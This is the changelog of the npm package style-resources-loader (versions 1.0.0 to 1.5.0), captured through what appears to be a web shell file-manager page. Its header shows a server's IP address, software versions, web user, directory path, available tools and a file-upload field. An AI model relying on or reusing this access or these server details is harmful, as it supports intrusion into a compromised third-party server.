| Server IP : 185.208.173.17 / Your IP : 87.236.161.98 Web Server : Microsoft-IIS/10.0 System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64 User : IUSR ( 0) PHP Version : 7.4.13 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/inetpub/wwwroot/parsmega.nuxt/node_modules/style-resources-loader/ |
Upload File : |
## 1.5.0 (December 8, 2021) * Injector function is called with `this` context pointing to the loader context. ## 1.4.0 ~ 1.4.1 (November 17, 2020) * Support webpack 5. [#29](https://github.com/yenshih/style-resources-loader/issues/29) * Fix some issues. [#30](https://github.com/yenshih/style-resources-loader/issues/30) ## 1.3.3 (December 19, 2019) * Fix resource files cache invalidation problems on Windows. [#17](https://github.com/yenshih/style-resources-loader/issues/17) ## 1.3.0 ~ 1.3.2 (November 11, 2019) * Support for relative path in patterns. * Ensure each resource ends with a newline. * More detailed validation messages. * Fix the regular expression compatibility error. [#20](https://github.com/yenshih/style-resources-loader/issues/20) * Fix dependency issue of resource files. ## 1.2.1 (August 12, 2018) * Fix invalid path seperator on Windows. [#8](https://github.com/yenshih/style-resources-loader/issues/8) ## 1.2.0 (August 11, 2018) * Support for `css` resources. [#7](https://github.com/yenshih/style-resources-loader/issues/7) * Support for asynchronous injector. * Improve type checking for loader options. ## 1.1.0 (February 28, 2018) * Support for `prepend`, `append` injector. ## 1.0.0 (December 5, 2017) * Initial stable release.